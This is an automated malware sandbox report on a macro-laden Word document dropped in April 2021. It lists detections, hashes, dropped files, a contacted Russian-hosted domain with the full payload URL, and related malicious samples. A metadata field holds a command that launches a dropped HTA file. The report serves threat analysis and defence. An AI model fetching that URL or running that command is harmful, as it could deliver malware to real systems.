Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Datei-04.28.2021.doc13%VirustotalBrowse
Datei-04.28.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
better-transport-2008.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/40%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs1%VirustotalBrowse
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs0%Avira URL Cloudsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
better-transport-2008.com
45.142.215.160
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTsfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comregsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpfalse
              high
              http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4vbaProject.binfalse
              • Avira URL Cloud: safe
              unknown
              http://www.%s.comPAregsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeregsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpfalse
                high
                http://servername/isapibackend.dllregsvr32.exe, 00000004.00000002.2092988316.0000000001CF0000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                45.142.215.160
                better-transport-2008.comRussian Federation
                202933CLOUDSOLUTIONSRUfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:399362
                Start date:28.04.2021
                Start time:17:46:43
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 21s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Datei-04.28.2021.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.winDOC@4/12@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                17:47:43API Interceptor1x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                CLOUDSOLUTIONSRUrichiedere-04.26.21.docGet hashmaliciousBrowse
                • 45.142.215.164
                richiedere-04.26.21.docGet hashmaliciousBrowse
                • 45.142.215.164
                richiedere-04.26.21.docGet hashmaliciousBrowse
                • 45.142.215.164
                verschreiben.04.26.2021.docGet hashmaliciousBrowse
                • 45.142.215.163
                verschreiben.04.26.2021.docGet hashmaliciousBrowse
                • 45.142.215.163
                verschreiben.04.26.2021.docGet hashmaliciousBrowse
                • 45.142.215.163
                3IsEcDekqj.exeGet hashmaliciousBrowse
                • 45.142.215.63
                Handel-04.20.2021.docGet hashmaliciousBrowse
                • 45.142.215.16
                Handel-04.20.2021.docGet hashmaliciousBrowse
                • 45.142.215.16
                der Vorschlag.04.21.docGet hashmaliciousBrowse
                • 45.142.215.16
                der Vorschlag.04.21.docGet hashmaliciousBrowse
                • 45.142.215.16
                der Vorschlag.04.21.docGet hashmaliciousBrowse
                • 45.142.215.16
                zu erzaehlen.docGet hashmaliciousBrowse
                • 45.142.215.32
                zu erzaehlen.docGet hashmaliciousBrowse
                • 45.142.215.32
                zu erzaehlen.docGet hashmaliciousBrowse
                • 45.142.215.32
                verschreiben 04.16.2021.docGet hashmaliciousBrowse
                • 45.142.215.32
                verschreiben 04.16.2021.docGet hashmaliciousBrowse
                • 45.142.215.32
                verschreiben 04.16.2021.docGet hashmaliciousBrowse
                • 45.142.215.32
                zu fordern.04.21.docGet hashmaliciousBrowse
                • 45.142.213.182
                zu fordern.04.21.docGet hashmaliciousBrowse
                • 45.142.213.182

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\argumentSelectTmp.jpg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text
                Category:dropped
                Size (bytes):204
                Entropy (8bit):5.134216527532146
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                MD5:FEDDB78986726A4A2161D362A5D52F25
                SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                Malicious:false
                Reputation:low
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\laka4[1].htm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text
                Category:downloaded
                Size (bytes):204
                Entropy (8bit):5.134216527532146
                Encrypted:false
                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3F3KCezocKqD:J0+oxBeRmR9etdzRxxez1T
                MD5:FEDDB78986726A4A2161D362A5D52F25
                SHA1:BAAA81B272211FA22DF14E3DCA322CE63FFA50B4
                SHA-256:2793291CF9D1C679B16DA071414FDE1E27A07508B616572332953DE5BB77083E
                SHA-512:42DAB38699465155F38326F6967F358549E89A470971CB66F7ECD08FC439CC18A8377FF9B2BF24882B13AE548A4DE9FFCC6FEB2E1EDA2484F9ADFDD489EBF92A
                Malicious:false
                Reputation:low
                IE Cache URL:http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs
                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "laka4" was not found on this server.</p>.</body></html>.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92D29733.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:[TIFF image data, little-endian, direntries=14, height=630, bps=182, compression=LZW, PhotometricIntepretation=RGB, orientation=upper-left, width=2288], baseline, precision 8, 828x186, frames 3
                Category:dropped
                Size (bytes):79188
                Entropy (8bit):7.847381222647767
                Encrypted:false
                SSDEEP:1536:3hdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6eh:MlZAPY2yWwb3ZadaxHeuNQpeh
                MD5:A1BAC07A20C5DF390D6D96B0FB713F5D
                SHA1:427F044786B5C412EF3B424CDA2DEA817AA9CCA6
                SHA-256:0638205EBB792E3447169B46FBFB6BC48A1433B8335794ED4CEB6706F5290EF3
                SHA-512:1EBB00551E59417AA5CC16D195E27EE227342108C4C093D9A747241BAC6AC54A48262686AD3911DFDCF89AA1EA3E2A1C91CAE790252A5C2C81978F362CCA2BA1
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .....xExif..II*...........................v...................................................................................................(...........1...........2...........i...........0................'.......'..Adobe Photoshop 22.2 (Windows).2021:04:08 01:34:08..........................<...........................................~...............(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................$...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......S.,.2....}....sC.:.....k..}OS.6~..?Yz.......}M...|....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Microsoft Word 2007+
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.469835486287775
                Encrypted:false
                SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
                MD5:747F920591F171BA793209DB3BFD8A21
                SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
                SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
                SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47F385A6-6281-436E-ACD1-2266A057AE87}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555D4EB4-8E09-401E-A760-1A1C7B299BE3}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5A73AA4B-62E1-448E-9310-09F37DB49412}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):0.1903644670878318
                Encrypted:false
                SSDEEP:3:/lMlt4slllFlNtwl5h9Z9:+lr45v
                MD5:43EADFFEFD5914B486C8193474EA3408
                SHA1:048972F9F902493E595F848E45052DF938621907
                SHA-256:46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
                SHA-512:11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
                Malicious:false
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162688
                Entropy (8bit):4.254404176001523
                Encrypted:false
                SSDEEP:1536:C6IL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CNJNSc83tKBAvQVCgOtmXmLpLm4l
                MD5:14FB2985EE00FC7637B8AB3AC19C232B
                SHA1:70865CE06647465D1C8D617D7B3822C6EED8FA26
                SHA-256:F807F0C3328C49E6DE9C375DE1B44A7AF6573C87E9DE732CBF28EF5D21C928DB
                SHA-512:982CB06D601BCEAB823364A859DBF54982C155C57EF17CBB0E07AAF60C46AF06641A00A6EAEC52B144A1F4D9DE33DB22EC86B05F7686EC7620098291478D7F46
                Malicious:false
                Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Apr 28 23:47:30 2021, length=90627, window=hide
                Category:dropped
                Size (bytes):2088
                Entropy (8bit):4.541049992446857
                Encrypted:false
                SSDEEP:24:8IU/XTwz6IkneDqOeebDv3q2dM7dD2IU/XTwz6IkneDqOeebDv3q2dM7dV:8b/XT3Ik4la2Qh2b/XT3Ik4la2Q/
                MD5:F3603CD4FAD8443004EB3A20F7FBF18F
                SHA1:98C244711422ABF826ACADDF440FAA84E84D7D1D
                SHA-256:5A64A7182FE5E360F10D8350BB951E41F18E47277EEFDBDE9F89C078048197A6
                SHA-512:485B665D124EAC582FE07172662A321F7DD0CC36E41A6DF48638FDCB7F4C34445BF7FD5258C021738DC0888DB751D5166D828566FB8A81AA86B50F02679C9E2D
                Malicious:false
                Preview: L..................F.... ....xV..{...xV..{.....;.<...b...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..b...R.. .DATEI-~1.DOC..V.......Q.y.Q.y*...8.....................D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop\Datei-04.28.2021.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9F.C....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):86
                Entropy (8bit):4.326022969633015
                Encrypted:false
                SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                Malicious:false
                Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.431160061181642
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                C:\Users\user\Desktop\~$tei-04.28.2021.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.431160061181642
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                Static File Info

                General

                File type:Microsoft Word 2007+
                Entropy (8bit):7.82220089201397
                TrID:
                • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                • ZIP compressed archive (8000/1) 5.23%
                File name:Datei-04.28.2021.doc
                File size:103261
                MD5:6747583727ce069aa8ae9d398d35e5bc
                SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Title:explorer c:\users\public\argumentSelectTmp.hta
                Subject:
                Author:ujmg
                Keywords:
                Template:Normal
                Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                Revion Number:2
                Total Edit Time:0
                Create Time:2021-04-28T04:45:00Z
                Last Saved Time:2021-04-28T04:45:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:4

                Document Summary

                Number of Lines:2
                Number of Paragraphs:0
                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0000

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 1127
                General
                Stream Path:VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:1127
                Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . - . . i . H . ! . . W D Q . . . . . . . . K . . . . y . ' y . . . . . . . . . . . . . . . . . . . . X . O z . Y $ L . . . & . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . X . O z . Y $ L . . . & . . . - . . - . . i . H . ! . . W D Q . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 71 cc 96 90 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 03 7f 2d b5 fa 69 1d 48 9e 21 86 f4 57 44 51 84 ef 8e e3 9e df be fe 4b b5 1f 1d 00 79 ba 27 79 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Creatable
                VB_Name
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                "ThisDocument"
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                VBA File Name: UserForm1.frm, Stream Size: 1182
                General
                Stream Path:VBA/UserForm1
                VBA File Name:UserForm1.frm
                Stream Size:1182
                Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . q . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 71 cc 28 c6 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Name
                VB_Creatable
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                VBA Code
                Attribute VB_Name = "UserForm1"
